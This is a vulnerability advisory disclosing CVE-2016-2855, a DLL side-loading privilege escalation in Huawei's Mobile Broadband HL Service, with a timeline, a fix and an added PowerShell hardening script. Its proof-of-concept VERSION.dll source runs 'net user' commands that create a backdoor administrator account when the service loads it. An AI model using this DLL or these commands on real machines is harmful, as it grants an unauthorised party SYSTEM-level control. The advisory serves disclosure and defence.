Huawei Mobile Broadband HL Service Local Privilege Escalation

Metadata
===================================================
Release Date: 12-05-2016
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected versions: up to the current 22.001.25.00.03 on x86 and x64
Tested on: Windows 7 32 bit and 64 bit
CVE: CVE-2016-2855
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/
Video: https://youtu.be/MwtjE2PmEJU
Vulnerability Status: Fixed
Abstract
===================================================
The Windows service "Mobile Broadband HL Service", as installed by many Huawei
3G/LTE modems, is vulnerable to a DLL side-loading attack that allows normal,
unprivileged users to gain full SYSTEM access.
Disclosure Timeline
===================================================
6.3.2016: Issue privately reported to Huawei
6.3.2016: CVE number requested
7.3.2016: MITRE assigned CVE-2016-2855
14.3.2016: Huawei verified the issue and is working on a fix
9.5.2016: Huawei informed me that the issue has been fixed in their latest
release. However, it is up to the carriers to push the fix to the devices.
Technical Details
===================================================
The service executable for the "Mobile Broadband HL Service" service is located
in "C:\ProgramData\MobileBrServ". Because the file permissions of this folder
allow normal users to add files, a malicious local attacker can drop a DLL named
VERSION.dll into this folder. During the next boot this DLL is loaded and
executed as part of the service launch. Since the service runs as LOCAL SYSTEM,
this results in a Local Privilege Escalation.
Proof of Concept
===================================================
#include <process.h>
/*
To compile 32bit dll:
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll
Put into C:\ProgramData\MobileBrServ and reboot your system -> a new
user will be added
*/
/* export all required functions - use Dependency Walker to check what is
needed */
extern "C"
{
__declspec(dllexport) int GetFileVersionInfoA();
__declspec(dllexport) int GetFileVersionInfoSizeA();
__declspec(dllexport) int VerQueryValueA();
}
/*
Implement DllMain with common datatypes so we don't have to include
windows.h.
Otherwise this would cause several compile errors because of the
already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // drop a marker file to prove the DLL was loaded
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");
return 0;
}
/* Implement stubs of our exports */
int GetFileVersionInfoA() {
return 0;
}
int GetFileVersionInfoSizeA() {
return 0;
}
int VerQueryValueA() {
return 0;
}
Suggested Solution
===================================================
The correct solution to prevent this attack is to change the filesystem ACLs so
that normal users are prohibited from creating files and directories within the
C:\ProgramData\MobileBrServ folder.
Workaround
===================================================
Until Huawei pushes a fix, the filesystem ACLs should be updated manually to
prevent normal users from writing anything into the service directory
(C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.
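The ACL check and icacls hardening described above, as an added example that is not part of the advisory: it lists the ACEs that let ordinary users create files in the service directory and, if any exist, backs up and rewrites the DACL. It assumes an elevated PowerShell session and English account names; granting Users read/execute only is an assumption that the service's components need nothing more than read access to the folder.

```powershell
# Added example, not part of the advisory: audit C:\ProgramData\MobileBrServ for
# ACEs that let ordinary users drop files into it, then apply the advisory's
# workaround with icacls.exe. Assumes an elevated session and an English
# Windows (account names are matched by display name).
$ServiceDir = 'C:\ProgramData\MobileBrServ'
$BackupFile = Join-Path $env:TEMP 'MobileBrServ_acl_backup.txt'

# FILE_WRITE_DATA (0x2) and FILE_APPEND_DATA (0x4) are "create files" and
# "create subfolders" on a directory; Write, Modify and FullControl contain
# them. GENERIC_WRITE / GENERIC_ALL cover ACEs that still use generic bits.
$WriteMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'Everyone', 'NT AUTHORITY\INTERACTIVE')

# Returns the Allow ACEs that give a broad principal any create/write right.
function Get-WritableByUsers {
    param([string]$Path)
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadPrincipals -contains $_.IdentityReference.Value -and
        (([int]($_.FileSystemRights)) -band $WriteMask) -ne 0
    }
}

# Backs up the current DACLs, then replaces them: SYSTEM and Administrators
# get full control, Users read/execute only. Well-known SIDs (*S-1-5-18 =
# SYSTEM, *S-1-5-32-544 = Administrators, *S-1-5-32-545 = Users) avoid
# localized group names. Revert from the parent: icacls C:\ProgramData /restore <backup>
function Protect-ServiceDir {
    param([string]$Path, [string]$Backup)
    & icacls.exe $Path /save $Backup /T /C | Out-Null
    & icacls.exe $Path /inheritance:r /grant:r '*S-1-5-18:(OI)(CI)F' `
        '*S-1-5-32-544:(OI)(CI)F' '*S-1-5-32-545:(OI)(CI)RX' /T /C | Out-Null
}

$Before = Get-WritableByUsers -Path $ServiceDir
if (-not $Before) {
    Write-Output "No write ACE for broad principals on $ServiceDir"
    return
}
$Before | Format-Table IdentityReference, FileSystemRights, IsInherited -AutoSize
Protect-ServiceDir -Path $ServiceDir -Backup $BackupFile
if (Get-WritableByUsers -Path $ServiceDir) {
    Write-Error "$ServiceDir is still writable by broad principals; check the icacls output"
} else {
    Write-Output "Hardened $ServiceDir; previous DACLs saved to $BackupFile"
}
```

Run the audit part alone first on a machine with the affected driver package installed; the default ProgramData inheritance is what makes the folder writable, so expect an inherited BUILTIN\Users ACE before hardening.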
Sent through the Full Disclosure mailing list: https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
